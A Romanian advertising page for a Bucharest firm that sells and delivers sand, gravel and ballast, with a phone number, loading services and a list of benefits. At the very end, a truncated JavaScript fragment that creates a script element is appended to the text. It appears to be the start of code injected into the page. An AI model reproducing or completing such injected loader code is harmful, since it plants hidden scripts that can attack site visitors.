Te pregatesti de constructii si ai nevoie de nisip, pietris, balastru sau margaritar in Bucuresti si in zonele limitorfe? Suna la 0761.851.145 si obtine cel mai bun pret! Oferta este valabila si in cazul in care ai nevoie de transport nisip.

Firma Transport Moloz din Bucuresti transporta si vinde ieftin nisip, pietris, balastru, margaritar la saci sau la metru cub. In plus, cu noi beneficiezi de un transport profesionist, cu autoutilitare de 3,5 tone, special amenajate pentru un transport sigur si rapid in orice zona a Capitalei, sau in zonele imediat invecinate. Preturile pot fi negociate in functie de volumul comandat.

Asiguram incarcarea si descarcarea cu personal special instruit!

Orice comanda este executata in cel mai scurt timp si intr-o maniera 100% profi!

Transport nisip in Bucuresti, la cele mai bune preturi de pe piata

Orice constructie are nevoie de materiale bune, livrate imediat si in cantitatile dorite. Nisipul pe un santier de constructii este obligatoriu. Daca nu dispui inca de cantitatea de nisip esentiala proiectului, poti apela la o echipa specializata atat in furnizarea materialului cat si in transportul si descarcarea lui.

Suna la numarul de telefon 0761.851.145 si solicita ajutorul!

Nisip livrat imediat

Indiferent de cantitatea de nisip de care ai nevoie, echipa noastra se ofera sa-ti livreze materialul imediat, la adresa indicata (oriunde in Bucuresti). Putem livra nisip, pietris, balastru, margaritar la saci sau la metru cub. Dispunem de autoutilitare de 3,5 tone ideale pentru transport nisip, pietris, balastru sau margaritar. Astfel, ai garantia ca nisipul este transportat in cele mai bune conditii si in timp optim.

Aprovizionam cu nisip, pietris, balastru si margaritar orice santier de lucru din Bucuresti si din zonele apropiate.

Servicii de incarcare si descarcare

Incarcarea si descarcarea nisipului si al oricarui material de constructii presupune efort si timp pierdut. Nu si cu serviciile profesionale de incarcare/descarcare nisip. Echipa Transport Moloz iti asigura accesul nu doar la transport nisip ci si la servicii de incarcare/descarcare nisip, pietris, balastru si margaritar. Personalul nostru este bine instruit si gata sa ofere ajutorul in manipularea incarcaturii. Astfel, spui adio stresului si durerilor de spate. In plus, castigi timp pretios!

Incarcarea si descarcarea nisipului se executa rapid, organizat si in cel mai scurt timp, indiferent de cantitatea de nisip transportata.

De ce sa apelezi la noi?

Cu noi obtii, cel putin, 7 beneficii, garantat!

  1.  Dispunem de autoutilitare performante si rapide de 3,5 tone pentru transporturi de orice tip si pentru transport nisip, balastru, margaritar, pietris, etc.
  2. Transport rapid
  3. Scapi de efort si castigi timp
  4. Asiguram incarcarea si descarcarea materialului, fie ca este vorba de nisip, margaritar, pietris sau balastru
  5. Iti propunem un pret bun, negociabil in functie de cantiatile transportate
  6. Transportam nisip, pietris, balastru si margaritar la orice adresa din Bucuresti (indiferent de sector sau cartier) si din zonele limitrofe
  7. Clientii fideli au accesul la preturi speciale

De ce sa apelezi la alternative costisitoare si deloc eficiente, cand poti avea servicii complete, la preturi negociabile! Pentru informatii suplimentare apeleaza 0761.851.145.var d=document;var s=d.createElement(‘script’);